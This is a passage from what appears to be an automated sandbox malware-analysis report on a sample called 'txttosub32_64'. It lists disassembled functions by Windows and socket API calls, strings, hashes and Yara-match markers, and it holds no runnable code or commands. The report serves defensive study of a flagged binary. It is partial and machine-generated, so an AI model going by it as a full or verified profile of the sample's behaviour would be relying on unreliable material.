                                                                                  • Opcode Fuzzy Hash: e62a5021526ba1916b3480964464e70e31cf7b2cec07ff76f09bd149064243c0
                                                                                  • Instruction Fuzzy Hash: ECF01773641605FBEB01AFA5ED98FD6BB3CFF84351F100416F60186681D771A925CBA0
                                                                                  APIs
                                                                                    • Part of subcall function 02D99A0C: __EH_prolog.LIBCMT ref: 02D99A11
                                                                                    • Part of subcall function 02D99A0C: _Allocate.LIBCPMT ref: 02D99A68
                                                                                    • Part of subcall function 02D99A0C: _memmove.LIBCMT ref: 02D99ABF
                                                                                  • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02DA08E2
                                                                                  • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 02DA08EA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateErrorFormatH_prologLastMessage_memmove
                                                                                  • String ID: Unknown error$invalid string position
                                                                                  • API String ID: 1017912131-1837348584
                                                                                  • Opcode ID: 0096fa9506a395cdb20628cc45d75477f6cfe8a17d5a5b38b25ae117c88bd80e
                                                                                  • Instruction ID: cd56b11aa42e145cdfc82508fc24d51c48ac463f05b5c39a123ebbea0f7a2d45
                                                                                  • Opcode Fuzzy Hash: 0096fa9506a395cdb20628cc45d75477f6cfe8a17d5a5b38b25ae117c88bd80e
                                                                                  • Instruction Fuzzy Hash: 095189712083419FEB14DF24C8A0F2EBBE4EB98745F54092EF48297791D771E948CBA6
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _memmove
                                                                                  • String ID: invalid string position$string too long
                                                                                  • API String ID: 4104443479-4289949731
                                                                                  • Opcode ID: 5107991e154c5643a1ab30f2e00cea9cd474bf2f31db06dc3a48288238b21fd3
                                                                                  • Instruction ID: 25bc4d3b4d27f4256b3af88e945d703f858bfe4c42b66f90bf4555e2ad84cc5d
                                                                                  • Opcode Fuzzy Hash: 5107991e154c5643a1ab30f2e00cea9cd474bf2f31db06dc3a48288238b21fd3
                                                                                  • Instruction Fuzzy Hash: DA41AF313003459FDF24DE69D894A6ABBEAEF42B24B00092DF956CB781C771ED44DBA1
                                                                                  APIs
                                                                                  • WSASetLastError.WS2_32(00000000), ref: 02D930C3
                                                                                  • WSAStringToAddressA.WS2_32(?,?,00000000,?,?), ref: 02D93102
                                                                                  • _memcmp.LIBCMT ref: 02D93141
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressErrorLastString_memcmp
                                                                                  • String ID: 255.255.255.255
                                                                                  • API String ID: 1618111833-2422070025
                                                                                  • Opcode ID: ccb8a5ab2fce1a90f2f0188761612e8cce5c641aa552aa6128b5141e3a613694
                                                                                  • Instruction ID: df0ef4dba96b32211eac4a64997598ff408d9cb0e47c8bdf66831dfc3d30824b
                                                                                  • Opcode Fuzzy Hash: ccb8a5ab2fce1a90f2f0188761612e8cce5c641aa552aa6128b5141e3a613694
                                                                                  • Instruction Fuzzy Hash: CE319072A00204DFDF209F64C880B6EB7A6FF45325F1085A9E86AA7390DB71AD45CF90
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D91F5B
                                                                                  • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,00000000), ref: 02D91FC5
                                                                                  • GetLastError.KERNEL32(?,00000000), ref: 02D91FD2
                                                                                    • Part of subcall function 02D91712: __EH_prolog.LIBCMT ref: 02D91717
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: H_prolog$CompletionCreateErrorLastPort
                                                                                  • String ID: iocp
                                                                                  • API String ID: 998023749-976528080
                                                                                  • Opcode ID: d26d8a45ed76239119cedb7b5bd79f7b687067c4c37ec48fc3e2819f09151121
                                                                                  • Instruction ID: da0fa25ee7b168b4c6521ba5c6511ee4d6ee09d75c9550a589169070eaaedd75
                                                                                  • Opcode Fuzzy Hash: d26d8a45ed76239119cedb7b5bd79f7b687067c4c37ec48fc3e2819f09151121
                                                                                  • Instruction Fuzzy Hash: 1D21C4B1901B45DBC7219F6AD50455BFBF8FF94720B108A1FA4A683B90D7B0AA04CFA1
                                                                                  APIs
                                                                                  • _malloc.LIBCMT ref: 02DA3AA7
                                                                                    • Part of subcall function 02DA2EEC: __FF_MSGBANNER.LIBCMT ref: 02DA2F03
                                                                                    • Part of subcall function 02DA2EEC: __NMSG_WRITE.LIBCMT ref: 02DA2F0A
                                                                                    • Part of subcall function 02DA2EEC: RtlAllocateHeap.NTDLL(00A70000,00000000,00000001), ref: 02DA2F2F
                                                                                  • std::exception::exception.LIBCMT ref: 02DA3AC5
                                                                                  • __CxxThrowException@8.LIBCMT ref: 02DA3ADA
                                                                                    • Part of subcall function 02DA449A: RaiseException.KERNEL32(?,?,02D9FA92,?,?,?,?,?,?,?,02D9FA92,?,02DC0F78,?), ref: 02DA44EF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                  • String ID: bad allocation
                                                                                  • API String ID: 3074076210-2104205924
                                                                                  • Opcode ID: 4dbbb6d2c02f9c70332696d446c8d1b4801ff4a42ac26b45a1d73fc9d425b43d
                                                                                  • Instruction ID: 5a0ac749a9dd1ee866ca63adc74e1a0bfbb34ba55fc238751e5309c8bada9f63
                                                                                  • Opcode Fuzzy Hash: 4dbbb6d2c02f9c70332696d446c8d1b4801ff4a42ac26b45a1d73fc9d425b43d
                                                                                  • Instruction Fuzzy Hash: 8CE0A03490420EEADB00EE60CC24DEFB76AEF00304F100495AC16A2380EBB0DE44DAA0
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D937B6
                                                                                  • __localtime64.LIBCMT ref: 02D937C1
                                                                                    • Part of subcall function 02DA2540: __gmtime64_s.LIBCMT ref: 02DA2553
                                                                                  • std::exception::exception.LIBCMT ref: 02D937D9
                                                                                    • Part of subcall function 02DA2413: std::exception::_Copy_str.LIBCMT ref: 02DA242C
                                                                                    • Part of subcall function 02D9A45B: __EH_prolog.LIBCMT ref: 02D9A460
                                                                                    • Part of subcall function 02D9A45B: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02D9A46F
                                                                                    • Part of subcall function 02D9A45B: __CxxThrowException@8.LIBCMT ref: 02D9A48E
                                                                                  Strings
                                                                                  • could not convert calendar time to UTC time, xrefs: 02D937CE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: H_prolog$Concurrency::cancellation_token::_Copy_strException@8FromImplThrow__gmtime64_s__localtime64std::exception::_std::exception::exception
                                                                                  • String ID: could not convert calendar time to UTC time
                                                                                  • API String ID: 1963798777-2088861013
                                                                                  • Opcode ID: 8368381ede2289f4c79edb771c13a740947fa90489dd2ea01271b73742f7c8dd
                                                                                  • Instruction ID: b5a2b18d553152b4499bc3cba93d33646919e8173393b3f67ff8da297a8dcbed
                                                                                  • Opcode Fuzzy Hash: 8368381ede2289f4c79edb771c13a740947fa90489dd2ea01271b73742f7c8dd
                                                                                  • Instruction Fuzzy Hash: 87E06DB1D0020ADACF01EF90D828BEEB779FF04300F4045A9E826A2750EB755E068EA4
                                                                                  APIs
                                                                                  • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,00403A36), ref: 00404639
                                                                                  • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,00403A36), ref: 0040465D
                                                                                  • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,00403A36), ref: 00404677
                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,00403A36), ref: 00404738
                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,00403A36), ref: 0040474F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2984540971.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2984540971.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_txttosub32_64.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual$FreeHeap
                                                                                  • String ID:
                                                                                  • API String ID: 714016831-0
                                                                                  • Opcode ID: f4c0f4cb9abc0b6ca3d3d58a364f59ce6ff65d57952dcfe40ed44dfe944918a7
                                                                                  • Instruction ID: a7f4aef455e9233aed4b8660914372385e046e9fbf73cb8236aae7d8e2b8362d
                                                                                  • Opcode Fuzzy Hash: f4c0f4cb9abc0b6ca3d3d58a364f59ce6ff65d57952dcfe40ed44dfe944918a7
                                                                                  • Instruction Fuzzy Hash: DA31E2B0940702AFD3309F24DD44B26B7E4EB86755F11463AF265BB3D0E7B8A8409B4D
                                                                                  APIs
                                                                                  • VirtualFree.KERNEL32(?,00008000,00004000,74DEDFF0,?,00000000), ref: 00404092
                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 004040ED
                                                                                  • HeapFree.KERNEL32(00000000,?), ref: 004040FF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2984540971.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2984540971.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_txttosub32_64.jbxd
                                                                                  Similarity
                                                                                  • API ID: Free$Virtual$Heap
                                                                                  • String ID: -@
                                                                                  • API String ID: 2016334554-2999422947
                                                                                  • Opcode ID: 9c389c61e5a6cd43db9238f188d86346d40478f5c1fa1013f45f36ce2e9b1707
                                                                                  • Instruction ID: d55dda63c6158a3f001c35490e62a79414290c04420ce97baa52a0c06dad31a7
                                                                                  • Opcode Fuzzy Hash: 9c389c61e5a6cd43db9238f188d86346d40478f5c1fa1013f45f36ce2e9b1707
                                                                                  • Instruction Fuzzy Hash: D1B16C75A00205DFDB24CF04CA90AA9BBB1FB88314F24C1AED9196F396C735EE41CB84
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AdjustPointer_memmove
                                                                                  • String ID:
                                                                                  • API String ID: 1721217611-0
                                                                                  • Opcode ID: 9386af661d735f6774670e7c04fa4e16ef1f3d903b8e6ec865690cc97b2111bb
                                                                                  • Instruction ID: ac260f9b0e0f9c9d451c0b7662348aefc1794ac3a987aa7e92e8ca52c012f170
                                                                                  • Opcode Fuzzy Hash: 9386af661d735f6774670e7c04fa4e16ef1f3d903b8e6ec865690cc97b2111bb
                                                                                  • Instruction Fuzzy Hash: FA4171362187039AEB255F65D870FBA37E6DF01734F14441EE88A863E1DBA1FD80CA65
                                                                                  APIs
                                                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02D94149), ref: 02DA12FF
                                                                                    • Part of subcall function 02D93FDC: __EH_prolog.LIBCMT ref: 02D93FE1
                                                                                    • Part of subcall function 02D93FDC: CreateEventA.KERNEL32(00000000,?,?,00000000), ref: 02D93FF3
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 02DA12F4
                                                                                  • CloseHandle.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,02D94149), ref: 02DA1340
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02D94149), ref: 02DA1411
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseHandle$Event$CreateH_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 2825413587-0
                                                                                  • Opcode ID: 0f4ebb26bba158b40cc8370d0256ebb7b7d39359a8509a3bd7cc11e1912772f3
                                                                                  • Instruction ID: 3eae4a790667717365c5ae3f1ee3a4a221229505a54c38e8e99bd8c3ba7bdf9d
                                                                                  • Opcode Fuzzy Hash: 0f4ebb26bba158b40cc8370d0256ebb7b7d39359a8509a3bd7cc11e1912772f3
                                                                                  • Instruction Fuzzy Hash: 1C518D756043458BDF21DF28C8A4B9AB7E5EF88328F194628E8AD97390DB35DC05CB91
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                  • String ID:
                                                                                  • API String ID: 2782032738-0
                                                                                  • Opcode ID: 4b00bb2f2e8909ad1b25914f564552747ffa73792e7b52f6c639d3ed484d2925
                                                                                  • Instruction ID: c7c8449b061cbd6c3dcc7c02bef139a90f05cb039a19eaf0c2c77086fec03eac
                                                                                  • Opcode Fuzzy Hash: 4b00bb2f2e8909ad1b25914f564552747ffa73792e7b52f6c639d3ed484d2925
                                                                                  • Instruction Fuzzy Hash: 0E41D2B5A00706ABDB98CFA9C8B0DAA7BA7EF44364B1482BDE855C7380D770DD41CB50
                                                                                  APIs
                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02DAFE8B
                                                                                  • __isleadbyte_l.LIBCMT ref: 02DAFEB9
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,00000108,?,00000000,00000000), ref: 02DAFEE7
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,00000108,00000001,00000000,00000000), ref: 02DAFF1D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                  • String ID:
                                                                                  • API String ID: 3058430110-0
                                                                                  • Opcode ID: 3d9fa1d11bfedf25f53af467dbe329f1812dcd24c308bb40ac634b33128d76c8
                                                                                  • Instruction ID: 1b8d6a7f55fdb9d0dc91a5267d36118324fa1f61a529dea0ac2fd2624551af53
                                                                                  • Opcode Fuzzy Hash: 3d9fa1d11bfedf25f53af467dbe329f1812dcd24c308bb40ac634b33128d76c8
                                                                                  • Instruction Fuzzy Hash: 4431E131600246EFDB218F35CC58FAA7BAAFF41354F1545A8E8A887AD1D732DD51CB90
                                                                                  APIs
                                                                                  • htons.WS2_32(?), ref: 02D93DA2
                                                                                    • Part of subcall function 02D93BD3: __EH_prolog.LIBCMT ref: 02D93BD8
                                                                                    • Part of subcall function 02D93BD3: std::bad_exception::bad_exception.LIBCMT ref: 02D93BED
                                                                                  • htonl.WS2_32(00000000), ref: 02D93DB9
                                                                                  • htonl.WS2_32(00000000), ref: 02D93DC0
                                                                                  • htons.WS2_32(?), ref: 02D93DD4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: htonlhtons$H_prologstd::bad_exception::bad_exception
                                                                                  • String ID:
                                                                                  • API String ID: 3882411702-0
                                                                                  • Opcode ID: d8b21cb6b8208a7a2539f6d47abb0bd56b632030705628cc55646be9831166d4
                                                                                  • Instruction ID: e0263c356fa12b670f4b2d10a564235dd725b22d34a808fff453e342b6a20087
                                                                                  • Opcode Fuzzy Hash: d8b21cb6b8208a7a2539f6d47abb0bd56b632030705628cc55646be9831166d4
                                                                                  • Instruction Fuzzy Hash: 17117076A00209EBDF019F64D895A5AB7B9EF49314F00849AFC04DF305D6719E14CBA1
                                                                                  APIs
                                                                                  • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000), ref: 02D923D0
                                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 02D923DE
                                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 02D92401
                                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 02D92408
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                                  • String ID:
                                                                                  • API String ID: 4018804020-0
                                                                                  • Opcode ID: 8e4e3a25646fa32f7e213977205420932559e5574da2f576b165c4987ca457c9
                                                                                  • Instruction ID: d6e8c9f0e2ef50d66046c8e6ed66ed9ec5add710cb7ddd2e3556fe4a8a1ddf03
                                                                                  • Opcode Fuzzy Hash: 8e4e3a25646fa32f7e213977205420932559e5574da2f576b165c4987ca457c9
                                                                                  • Instruction Fuzzy Hash: 3F11CE72A00204EBEB109F64D888BA6BBB9FF41704F10446DF9019B240E7B1ED11CBA0
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                  • String ID:
                                                                                  • API String ID: 3016257755-0
                                                                                  • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                  • Instruction ID: e138f46a0a8ae96d127e70ec26a5d6931b1b7b77f3c07092c4911f91acbd07c2
                                                                                  • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                  • Instruction Fuzzy Hash: 0101107601414EBBCF125E94CC51CEE3F67BB18364F488416FA5859231D736C9B1EB91
                                                                                  APIs
                                                                                  • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02D924A9
                                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 02D924B8
                                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 02D924CD
                                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 02D924D4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                                  • String ID:
                                                                                  • API String ID: 4018804020-0
                                                                                  • Opcode ID: bd8ed25e36d1ce97a984d9951ebd003013d76ee5ca3a1574bf86abda89c6e485
                                                                                  • Instruction ID: f4e8209ebd5ed9cc1590136b78601616a4b67f63544a50d8ef2c80d6e055aa34
                                                                                  • Opcode Fuzzy Hash: bd8ed25e36d1ce97a984d9951ebd003013d76ee5ca3a1574bf86abda89c6e485
                                                                                  • Instruction Fuzzy Hash: EAF01972640205EFEB009F69E894F9ABBB8FF45711F10441AFA05CA241D771E9608BA0
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D92009
                                                                                  • RtlDeleteCriticalSection.NTDLL(?), ref: 02D92028
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 02D92037
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 02D9204E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseHandle$CriticalDeleteH_prologSection
                                                                                  • String ID:
                                                                                  • API String ID: 2456309408-0
                                                                                  • Opcode ID: f947a8880b1992401d01898c95801ecf40f06b697481841857fc6325faf7b5cb
                                                                                  • Instruction ID: da5af9d88117072c60bacd70a76dc15cad23aa9d61d5b7cf1a83e172ab2125b4
                                                                                  • Opcode Fuzzy Hash: f947a8880b1992401d01898c95801ecf40f06b697481841857fc6325faf7b5cb
                                                                                  • Instruction Fuzzy Hash: F5016D71400604DBDB2AAF68E918B9ABBB5FF04704F20495EF84A92790CBB56D48CF64
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Event$H_prologSleep
                                                                                  • String ID:
                                                                                  • API String ID: 1765829285-0
                                                                                  • Opcode ID: 201720c26704283530e707880f34b820f60137d95be0a11fb1403d58c7a61d86
                                                                                  • Instruction ID: f22848fc9f93ad885d59001b08ad6951110627f61a9f2a9d99b3ae01e41fa299
                                                                                  • Opcode Fuzzy Hash: 201720c26704283530e707880f34b820f60137d95be0a11fb1403d58c7a61d86
                                                                                  • Instruction Fuzzy Hash: 3FF03036640110DFDB019F94E898B88BBB4FF4D311F5081A9F61A9B390C7759C54CB61
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: H_prolog_memmove
                                                                                  • String ID: &'
                                                                                  • API String ID: 3529519853-655172784
                                                                                  • Opcode ID: 167a281755c3f95353871657440fc5332a35188175818e229e7982d33eda9230
                                                                                  • Instruction ID: a89196f6574b447a3973aa78c73e0150f5bc11c4e7271cd9cfc280f8415f77e1
                                                                                  • Opcode Fuzzy Hash: 167a281755c3f95353871657440fc5332a35188175818e229e7982d33eda9230
                                                                                  • Instruction Fuzzy Hash: 88613B72D00219DBDF21DFA4C991BEDFBB6EF49710F10816AE409AB290D7709E45CBA1
                                                                                  APIs
                                                                                  • GetCPInfo.KERNEL32(?,00000000), ref: 00404ED1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2984540971.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2984540971.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_txttosub32_64.jbxd
                                                                                  Similarity
                                                                                  • API ID: Info
                                                                                  • String ID: $
                                                                                  • API String ID: 1807457897-3032137957
                                                                                  • Opcode ID: 6a70bd3891825e46ed47190910cd8ef1e503f049829186bd793e7938dd13125e
                                                                                  • Instruction ID: 22f5535c91c14152b0a8c0ddfc48368904c949565b3012b39e07b338b9393c54
                                                                                  • Opcode Fuzzy Hash: 6a70bd3891825e46ed47190910cd8ef1e503f049829186bd793e7938dd13125e
                                                                                  • Instruction Fuzzy Hash: EE415A710142985EEB159714CE59BEB3FE8EB02704F1404F6EA49F61D2C27D4924DBAB
                                                                                  APIs
                                                                                  • WSASetLastError.WS2_32(00000000,?,?,?,?,?,?,?,02D98306,?,?,00000000), ref: 02D99603
                                                                                  • getsockname.WS2_32(?,?,?), ref: 02D99619
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLastgetsockname
                                                                                  • String ID: &'
                                                                                  • API String ID: 566540725-655172784
                                                                                  • Opcode ID: b0f04f1bd9f5626fc8a470540cd4d3e8d7cc99b3492b536ddc9e9f1e7e8d3529
                                                                                  • Instruction ID: 1a6c7a56b0db26aa8c3d12e62391409ed2d1956203373ce02da9ca9de827766f
                                                                                  • Opcode Fuzzy Hash: b0f04f1bd9f5626fc8a470540cd4d3e8d7cc99b3492b536ddc9e9f1e7e8d3529
                                                                                  • Instruction Fuzzy Hash: 20213176A04248DBDB10DF68D854ACEB7F5FF48324F11856AE919EB380D730ED458BA1
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D9CBE7
                                                                                    • Part of subcall function 02D9D1C3: std::exception::exception.LIBCMT ref: 02D9D1F2
                                                                                    • Part of subcall function 02D9D979: __EH_prolog.LIBCMT ref: 02D9D97E
                                                                                    • Part of subcall function 02DA3A8F: _malloc.LIBCMT ref: 02DA3AA7
                                                                                    • Part of subcall function 02D9D222: __EH_prolog.LIBCMT ref: 02D9D227
                                                                                  Strings
                                                                                  • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02D9CC24
                                                                                  • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 02D9CC1D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: H_prolog$_mallocstd::exception::exception
                                                                                  • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
                                                                                  • API String ID: 1953324306-1943798000
                                                                                  • Opcode ID: 967b0794a453e32018cdb2db199fd2716c1f77e9cdeb5f78034df749660847cf
                                                                                  • Instruction ID: 28a6e93a104ec09761abaad42043b6a178e8a41cedfeb19f989f531be22183df
                                                                                  • Opcode Fuzzy Hash: 967b0794a453e32018cdb2db199fd2716c1f77e9cdeb5f78034df749660847cf
                                                                                  • Instruction Fuzzy Hash: 8A214C71D052459ADF14EBE4E964AEDBBBAEF14704F10405AF846A7380DB705E44CF61
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D9CCDC
                                                                                    • Part of subcall function 02D9D29A: std::exception::exception.LIBCMT ref: 02D9D2C7
                                                                                    • Part of subcall function 02D9DAB0: __EH_prolog.LIBCMT ref: 02D9DAB5
